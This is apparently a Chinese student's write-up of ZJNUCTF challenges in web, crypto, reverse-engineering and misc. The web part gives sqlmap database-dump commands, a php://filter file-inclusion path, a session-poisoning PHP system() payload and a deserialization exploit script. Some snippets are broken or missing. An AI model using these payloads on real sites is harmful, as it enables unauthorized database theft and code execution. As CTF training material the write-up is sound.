WEB
1.easy_php
<?php
highlight_file("index.php"); #高亮代码
include("flag.php"); #包含flag.php文件
$_aaa = "No No No";
$_bbb = "Welcome";
if($_SERVER["REQUEST_METHOD"]!="POST"){ #判断上传类型是不是POST,如果不是,就die
die("\n"."Welcome to ZJNUCTF!");
}
if(!isset($_POST["flag"])){ #POST一个flag变量
die ($_aaa);
}
foreach ($_GET as $key => $value){ #遍历一下post上来的数组
$$key = $$value;
}
foreach ($_POST as $key => $value){ #遍历一下get上来的数组
$$key = $value;
}
if ($_POST["flag"]!==$flag){ #如果post上来的变量跟flag.php里面的变量不一样,就die
die($_aaa);
}
else
{
echo "This is your flag : ".$flag."\n";
die($_bbb);
}
?>
分析代码的过程已经在上面了,总而言之就是要post一个flag,如果跟原来的flag一样,就输出。
参考链接:https://www.freebuf.com/column/150731.html
这里利用了变量覆盖漏洞,利用第一个foreach先将$flag
的值赋给$_bbb
,然后利用die($_bbb)
将原本的flag值打印出来。
构造payload:
2.Easysql
没啥好讲的,sqlmap一把嗦。
先用BP抓包,保存为2.txt
python2 sqlmap.py -r 2.txt --dbs --thread 5
跑了一遍,先跑了sys,发现不是这个数据库,是test数据库:
python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
3.lfi2rce
打开链接,提示:
提示了user.php,phpinfo.php.分别访问一下,发现phpinfo.php可以访问,并且给了php的一系列信息。
在index.php上,有一个文件包含漏洞include($_POST['file']);
,上传一个file变量,就可以获得想要文件的源码。利用方法为:
file=php://filter/read=convert.base64-encode/resource=user.php
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
base64解码一下,得到:
<?php
session_start();
echo $_COOKIE['user'];
$_SESSION['name'] = $_COOKIE['user'];
这里又存在一个cookie文件包含漏洞。先分析一下这个代码:
echo $_COOKIE['user'];
这里需要我们上传一个参数,为user,并且利用cookie传值的方式传输。
$_SESSION['name'] = $_COOKIE['user'];
这里将cookie传入的值赋给session。
首先我们随便传一个值:
传了一个cookie,值为admin。
然后去phpinfo对应的路径去寻找cookie:
/var/lib/php/sessions
这个即为存放路径,存放格式为sess_
+cookie值。
cookie值的查看方法在:
4stodq9feohijqk3jb9dlshjg4
这个即为cookie。
那么cookie存放的绝对路径为:/var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
我们再利用index.php的文件包含漏洞包涵一下cookie:
bmFtZXxzOjU6ImFkbWluIjs=
==>name|s:5:"admin";
将获得的数据base64解码以后,我们发现了我们上传了cookie。从而我们可以利用这个漏洞,去执行php的命令:
构造恶意用户名:
<?php system("ls"); ?>
bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw==
==>name|s:18:"<?php system("ls")";
这里发现base64解码的结果跟我们上传的参数不一样,应该是被过滤了。想办法绕过:url编码绕过。
查看源码,发现我们已经上传成功了:
再利用漏洞包含以下cookie:
bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs=
==>name|s:22:"<?php system("ls"); ?>";
为什么还是现实不出来呢,我也不知道为什么。经历了一下午的纠结之后,无意中想到去掉base64会怎么样,于是:
file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
找到文件名了,利用文件包含漏洞包含以下就出flag了:
flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
4.Babyweb
源码如下:
<?php
# flag in /flag
class red
{
private $filename = 'index.php';
function __toString()
{
return file_get_contents($this->filename);
}
}
function check($s) { //这个函数的作用,是规定我们输入的字符的ascii值必须在32-125之间(也就是不能输入%00)
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'exp'})) {
$exp = (string)$_GET['exp'];
if(check($exp)) {
$obj = unserialize($exp);
echo $obj;
}
}
highlight_file(__FILE__);
其实很简单,就是一个php反序列化漏洞。需要注意的就是:这里的filename是private属性。
private定义的变量,在序列化之后会生成两个空字节,一般来说空字节用%00
表示,但是由于check()函数不允许%00
的输入,所以必须用\00
代替,我不知道这一点,所以就崩了。
php脚本如下:
<?php
class red
{
private $filename = '/flag';
}
$a = new red();
echo serialize($a);
?>
这里的<0x00>就是空字节,如果你直接复制,粘贴的时候在这里就停下了。除此之外,需要将小写的s
改为大写(大佬说是php版本的特性)
果然改了以后上传就没毛病,我太菜了。
Crypto
1.hex
base64解码一下,然后放winhex就出来了。
得到666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
源码如下:
key="hello"
flag="*****************************************"
def pad(x,y):
y=y + (len(x) - len(y)) * chr(len(x) - len(y))
return y
def xor(x1,x2):
c=''
for i in range(len(x1)):
c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
return c
msg=xor(pad(flag,key),flag)
msg=msg.encode()
#msg=b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
理一下思路:
pad函数在flag、key的位数确定的情况下,就是一个定值。
xor函数是将x1,x2每一位进行异或。
异或的逆操作就是异或,先执行pad生成一个数(字符)即为M,M跟flag异或生成msg,我们要得到flag。只需要msg跟M异或即可。
M在flag位数确定,以及key确定的情况下为定值,所以此题得解。
脚本如下:
key="hello"
flag="*****************************************"
def pad(x,y):
y=y + (len(x) - len(y)) * chr(len(x) - len(y))
return y
def xor(x1,x2):
c=''
for i in range(len(x1)):
c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
return c
msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
msg = msg.decode()
print(xor(pad(flag,key), msg))
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
ida反编译一下,shift+F12直接看到flag。
2.放linux下upx解压一下,然后ida反编译即可。
3.RePY
脚本如下:
enc = [
34, 44, 39, 33, 61,
34, 115, 114, 117, 118,
116, 119, 120, 107, 35,
36, 36, 119, 107, 116,
127, 116, 37, 107, 127,
37, 37, 120, 107, 119,
127, 117, 116, 36, 119,
115, 38, 37, 36, 119,
119, 59]
for i in enc:
print(chr(i - 1 ^ 71),end='')
#flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
4.Jvav
用jadx反编译得到源码
package defpackage;
import java.util.Scanner;
/* renamed from: Main */
public class Main {
public static void main(String[] args) {
char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
String str = new String();
System.out.print("Please input the flag: ");
str = new Scanner(System.in).nextLine();
if (str.length() != 42) {
System.out.println("Wrong!");
return;
}
for (int i = 0; i < 42; i++) {
if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) {
System.out.println("Wrong!");
return;
}
}
System.out.println("Right!");
}
}
重点是最后一个for循环,先将flag左移3位,+1后右移一位,具体啥是移位不懂,在java下逆回来就行。
java脚本:
public class a1 {
public static void main(String[] args) {
char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
for (int i = 0; i < 42; i++) {
System.out.print(((enc[i] << 1) - 1) >> 3);
System.out.print(',');
}
System.out.println("Right!");
}
}
得到一串数字:
101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124
估计这个是ascii码,然后用python进行转换:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
print(chr(i,end='')
但是结果不对:
ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737|
代码改一下,改成i+1就对了:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
print(chr(i,end='')
flag{43aae1c8-870c-49d0-8958-53d106898848}
5.Sharpener
// test.Program
// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0
private static void Main(string[] args)
{
string[] enc = new string[]
{
"61894b21be75260c4964065b1eecec4d",
"3cd02adb6df3f967c3acda1705bb86f1",
"5c04925674920eb58467fb52ce4ef728",
"ffbb466329361588defb5e30e5df168f",
"448804aefe27492b9c183351328e7500",
"598f5f04d65b4e0e35515b367763fee6",
"d4398f22c157274df2d4643884db6a56",
"37afcb75609159217c5548ed91c0ba1b",
"28cb510090e7e926daa92745a8b02362",
"49f01756d2edd088b64afd670400f4ac",
"9f396fe44e7c05c16873b05ec425cbad",
"958be1aac9d0641822a4dbaa3ad9010f",
"82c89ed04868c75db962bb3bbe2d4b4c",
"36f88e7b053afdaff9f9d792d142a406"
};
Console.Write("Please input the flag: ");
string userInput = Console.ReadLine();
int x = 0;
int ul = 0;
string tmp = "";
if (userInput.Length != 42)
{
Console.WriteLine("That Wrong!");
return;
}
for (int i = 0; i < userInput.Length; i++)
{
tmp += userInput[i].ToString();
x++;
if (x % 3 == 0)
{
if (!enc[ul].Equals(Program.GenerateMD5(tmp)))
{
Console.WriteLine("That Wrong!");
return;
}
x = 0;
tmp = "";
ul++;
}
}
Console.WriteLine("Right!");
}
把这几个md5值破解拼起来就是一个flag
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}
6.Bytecoding
这个题目有点意思,拿到的是一个文本文档。内容如下:
3 0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
4 88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ')
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
5 96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
6 108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
7 116 LOAD_CONST 0 (None)
118 RETURN_VALUE
8 >> 120 SETUP_LOOP 52 (to 174)
122 LOAD_GLOBAL 3 (range)
124 LOAD_CONST 21 (42)
126 CALL_FUNCTION 1
128 GET_ITER
>> 130 FOR_ITER 40 (to 172)
132 STORE_FAST 2 (i)
9 134 LOAD_FAST 0 (enckey)
136 LOAD_FAST 2 (i)
138 BINARY_SUBSCR
140 LOAD_GLOBAL 4 (ord)
142 LOAD_FAST 1 (inpt)
144 LOAD_FAST 2 (i)
146 BINARY_SUBSCR
148 CALL_FUNCTION 1
150 LOAD_CONST 23 (1)
152 BINARY_SUBTRACT
154 COMPARE_OP 3 (!=)
156 POP_JUMP_IF_FALSE 130
10 158 LOAD_GLOBAL 2 (print)
160 LOAD_CONST 22 ('Wrong')
162 CALL_FUNCTION 1
164 POP_TOP
11 166 LOAD_CONST 0 (None)
168 RETURN_VALUE
170 JUMP_ABSOLUTE 130
>> 172 POP_BLOCK
12 >> 174 LOAD_GLOBAL 2 (print)
176 LOAD_CONST 24 ('Right')
178 CALL_FUNCTION 1
180 POP_TOP
182 LOAD_CONST 0 (None)
184 RETURN_VALUE
本来以为这玩意是汇编,然鹅这个是python字节码。
看了一下,勉强看懂了一点。
0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
第一块,应该是一个数组(列表),里面装了['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']
这几个数据。
88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ') inpt=input("GoGoGo Input Flag:")
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
第二块反编译过来应该就是一句代码。inpt=input("GoGoGo Input Flag:")
96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
第三块、第四块大概就是
if len(inpt) != 42:
print("wrong")
之后我就看不大懂了,大概就是inpt
跟enckey
进行什么计算,满足什么条件才能输出right
。
我这边看了一下,f
的ascii码是102
,enckey
的第一个值是101,看看逐个+1以后,会出现什么结果。
脚本附上:
list=['101','107','96','102','122','49','98','47','96',
'101','51','52','56','44','54','98','96','48','44','51',
'96','51','53','44','97','55','48','54','44','101','48',
'53','98','51','56','99','101','53','98','98','98','124']
for i in list:
print(chr(int(i)+1),end='')
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
这也太神奇了吧
Misc
1.签到题
关注公众号,回复zjnuctf拿flag
2.真·签到
下载得到一个word,打开隐藏文字即可得到flag。
3.你知道汉信码吗
网上找到四个角拼接得到图
4.Keyboard
参考:
https://www.cnblogs.com/hackxf/p/10670844.html
https://blog.csdn.net/qq_36609913/article/details/78578406
现在linux下执行以下语句:
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
得到一堆数字:
一行有16个数字,两个数字为1位,也就是8位。第3位上的数字,就是我们敲击键盘时候所对应的字母。
对照表如下:
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
关注完第位以后,关注第一位,有时候是0,有时候是2,盲猜第一位是2的时候为按住shift键。对了以下,刚好前面几位是flag{
构造脚本:
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
flag=''
f = open('usbdata.txt','r')
for i in range(200):
l = f.readline()
if l[4:6] == '00':
continue
elif l[0]=='2':
flag += shiftKeys[l[4:6]]
elif l[0]=='0':
flag += normalKeys[l[4:6]]
else:
continue
print(flag)
#flag{4565fd58-c9b2-4544-86f7-872e38433467}
这里因为我不知道多少行我就多跑了几次,python会执行到有错误的地方自动停止。
5.有趣的Minecraft
把图片用winhex打开,找到最后有一行base64,解码得到cnserver.bi0x.cn
打开游戏,进去。
flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
密码为UVWHZAITWAU
图片上有四种密码,第一种是MIMIMOYS
,第二种是银河字母
,第三种是小人舞旗
,第四种是鸟图腾
。
第一种和第四种是啥我不知道,但是不妨碍我爆破。
本来按照表对出来,是HZAIYQ
中间的部分字母然后前三位,后两位就盲猜,爆破就行。
生成字典的脚本附上:
list='HZAITQ'
all='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(len(all))
f=open("pass.txt","a")
for i in all:
for j in all:
for k in all:
for l in all:
for m in all:
for n in all:
flag=i+j+k+list+l+m
f.write(flag+"\n")
f.close()
跑了挺久的,但是不太对,我仔细核对了一遍,还是错。
那应该是已知的六位中出了错。先猜只有一位错了,试了六次,还费了挺久的时间,终于发现一直的六位,最后一位出错,是W
。orz
然后,打开压缩包,就得到了flag。
7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
这里是摩斯密码,密码为.-/-./-..
,翻译过来是and
这里是旗语
,翻译过来是the
。
linux下命令行执行一下,得到game
综上:000{w3lc0me_1337_players_and_good_luck_with_the_game}